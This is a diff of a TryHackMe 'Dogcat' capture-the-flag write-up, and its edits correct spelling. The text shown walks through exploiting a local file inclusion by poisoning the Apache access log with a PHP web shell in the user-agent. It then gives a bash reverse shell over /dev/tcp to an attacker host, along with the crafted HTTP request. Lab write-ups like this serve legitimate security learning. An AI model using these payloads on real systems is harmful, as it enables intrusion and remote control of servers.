elomarii/CTF_4_DAY/TryHackMe/Dogcat.md

         ?>
 <...snip...>
 ```
 First, we now validate how the app decides when a value of *view* is valid.
-And second, the url argument *ext* is used to specify the extension of the file to include and thus, we can now include whatever file (according to permissions) on the server.
+Second, the URL argument *ext* is used to specify the extension of the file to include, and thus, we can now include whatever file (according to permissions) on the server.

-One common method to exploit LFI vulnerabilities is log poisonning.
-For this, we poison our user-agent to acheive RCE when we include the log file.\
+One common method to exploit LFI vulnerabilities is log poisoning.
+For this, we poison our user-agent to achieve RCE when we include the log file.\

-- Log file location : `/var/log/apache2/access.log`
+- Log file location: `/var/log/apache2/access.log`
-- User Agent : `<h1><?php system($_GET['cmd']); ?></h1>`
+- User Agent: `<h1><?php system($_GET['cmd']); ?></h1>`
 - Result when visiting `http://<machine_ip>/?view=cats/../../../../var/log/apache2/access.log&ext=&cmd=id`

 ![Screenshot_2023-12-08_20_29_42](https://github.com/elomarii/CTF_4_DAY/assets/106914699/62233aba-1ee3-4977-9435-09672e19054a)

 Now that we can execute commands on the target machine, let's first get a reverse shell.\
-We can use Burpsuite to manipulate the http request, the crafted request I used is the following, where the bash command used is `bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'`.
-Don't forget to started a listener on your machine before sending the request.
+We can use Burpsuite to manipulate the HTTP request, the crafted request I used is the following, where the bash command used is `bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'`.
+Don't forget to start a listener on your machine before sending the request.
 ```http
 GET /?view=cats/../../../../var/log/apache2/access.log&ext=&cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/<rhost>/<rport>+<%261' HTTP/1.1
 Host: <machine_ip>